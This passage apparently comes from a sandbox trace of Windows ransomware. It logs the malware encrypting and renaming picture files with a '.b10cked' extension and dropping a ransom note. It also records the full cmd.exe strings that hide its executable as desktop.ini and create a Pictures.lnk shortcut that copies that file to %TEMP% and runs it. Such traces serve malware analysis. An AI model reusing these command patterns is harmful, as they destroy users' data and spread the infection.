lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.967] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5bb1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5bb1, lpOverlapped=0x0) returned 1 [0138.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.968] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5bb1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5bb1, lpOverlapped=0x0) returned 1 [0138.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=-23473, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5bb3 [0138.968] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5bb1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5bb1, lpOverlapped=0x0) returned 1 [0138.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=-23473, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5bb3 [0138.968] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5bb1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5bb1, lpOverlapped=0x0) returned 1 [0138.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aR0_1pZCSZwjfY.jpg", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0138.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aR0_1pZCSZwjfY.jpg", cchWideChar=18, lpMultiByteStr=0x13288fc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aR0_1pZCSZwjfY.jpg", lpUsedDefaultChar=0x0) returned 18 [0138.976] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb764 [0138.976] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.977] CloseHandle (hObject=0x114) returned 1 [0138.978] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG") returned 0x26 [0138.978] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0138.978] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xfa4, dwThreadId=0xefc)) returned 1 [0138.987] CloseHandle (hObject=0x110) returned 1 [0138.987] CloseHandle (hObject=0x114) returned 1 [0138.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0138.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0138.987] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount2=45) returned 3 [0138.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0138.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.987] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.987] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.987] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.988] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.988] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0138.988] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.988] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.988] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xfa0, dwThreadId=0xf94)) returned 1 [0138.995] CloseHandle (hObject=0x110) returned 1 [0138.995] CloseHandle (hObject=0x114) returned 1 [0138.995] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf")) returned 0xffffffff [0138.995] GetLastError () returned 0x2 [0138.995] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0138.999] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf")) returned 0x20 [0138.999] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.999] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.999] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.999] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.999] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0139.000] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0139.000] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0139.000] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0139.000] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0139.000] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0139.000] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures") returned 0x19 [0139.000] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\PICTURES\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\PICTURES\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\PICTURES\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\PICTURES\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0139.000] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0139.000] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xf90, dwThreadId=0xf98)) returned 1 [0139.244] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0143.267] CloseHandle (hObject=0x114) returned 1 [0143.267] CloseHandle (hObject=0x110) returned 1 [0143.267] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0143.268] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0143.268] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0143.268] GetTickCount () returned 0x2cc91 [0143.268] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20005705189) returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x66\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x55\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x44\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0143.268] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0143.268] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0143.268] CharUpperBuffW (in: lpsz="explorer.exe \"Pictures\" & type \"Pictures\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"PICTURES\" & TYPE \"PICTURES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0143.268] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0143.268] CharUpperBuffW (in: lpsz="explorer.exe \"Pictures\" & type \"Pictures\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"PICTURES\" & TYPE \"PICTURES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0143.268] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0143.268] CoInitialize (pvReserved=0x0) returned 0x0 [0143.269] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0143.270] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0143.270] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0143.270] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0143.272] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Pictures\" & type \"Pictures\\desktop.ini\" > \"%TEMP%\\XfsjUPkD.exe\" && \"%TEMP%\\XfsjUPkD.exe\"") returned 0x0 [0143.272] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0143.272] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0143.272] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0143.272] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Pictures.lnk", fRemember=0) returned 0x0 [0143.280] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0143.280] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0143.280] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0143.280] CoUninitialize () [0143.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.280] ReleaseMutex (hMutex=0xf8) returned 1 [0143.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.280] ReleaseMutex (hMutex=0xf8) returned 1 [0143.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.280] ReleaseMutex (hMutex=0xf8) returned 1 [0143.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.280] ReleaseMutex (hMutex=0xf8) returned 1 [0143.281] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20007004209) returned 1 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: 